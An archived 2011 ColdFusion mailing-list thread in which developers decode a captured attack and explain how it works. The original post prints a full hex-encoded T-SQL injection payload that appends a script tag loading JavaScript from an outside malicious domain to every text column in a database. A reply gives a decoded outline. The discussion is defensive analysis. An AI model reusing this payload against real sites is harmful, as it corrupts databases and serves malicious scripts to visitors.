Yep.... a bit cleaner than the last attack like this I saw.
-----Original Message-----
From: Russ Michaels [mailto:r...@michaels.me.uk]
Sent: Friday, May 13, 2011 10:31 AM
To: cf-talk
Subject: Re: Can anyone decode this?
it is some very clever SQL though
On Fri, May 13, 2011 at 3:57 PM, Mark A. Kruger
<mkru...@cfwebtools.com>wrote:
>
> This tries to append a malicious script to all the character columns in
> your
> DB in the hopes that you will select them and output them to a page (thus
> propogating the link).
>
> The script is a <script> block that redirects to a malicious site. Here's
> the basic out line with the script removed.
>
>
>
> DECLARE @T varchar(255),
> @C varchar(4000)
> DECLARE Table_Cursor CURSOR FOR select a.name,b.name
> from sysobjects a,syscolumns b
> where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or
> b.xtype=231 or b.xtype=167)
>
>
> OPEN Table_Cursor
> FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
>
> BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''*****malicious
> script******'' where '+@C+' not like ''%*****malicious script***''')
>
> FETCH NEXT FROM Table_Cursor INTO @T,@C END
>
> CLOSE Table_Cursor DEALLOCATE Table_Cursor
>
>
> Mark A. Kruger, MCSE, CFG
> (402) 408-3733 ext 105
> www.cfwebtools.com
> www.coldfusionmuse.com
> www.necfug.com
>
>
> -----Original Message-----
> From: Jeff Garza [mailto:j...@garzasixpack.com]
> Sent: Friday, May 13, 2011 9:39 AM
> To: cf-talk
> Subject: RE: Can anyone decode this?
>
>
> Put this in your SQL Query analyzer tool and change the EXEC at the end to
> PRINT. It should print out the SQL Statement for you to see what they
were
> trying to do.
>
> Cheers,
>
> Jeff
>
> -----Original Message-----
> From: Che Vilnonis [mailto:ch...@asitv.com]
> Sent: Friday, May 13, 2011 7:31 AM
> To: cf-talk
> Subject: Can anyone decode this?
>
>
> Can anyone decode this? This was a URL attack that was caught by some
> custom
> code. I tried decoding the string at
> http://meyerweb.com/eric/tools/dencoder/ but had no luck.
>
> 113|736;DECLARE @S CHAR(4000);SET
>
>
@S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861
>
>
72283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F
>
>
522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A65637473
>
>
20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E
>
>
78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D33
>
>
35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E20
>
>
5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4375
>
>
72736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30
>
>
2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40
>
>
432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D
>
>
22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363
>
>
726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B652027272522
>
>
3E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D
>
>
672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D2727272946455443
>
>
48204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C40432045
>
>
4E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C65
> 5F437572736F72 AS CHAR(4000));EXEC(@S);
>
> Thanks, Che
>
>
>
>
>
>
>
>
>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive:
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:344498
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
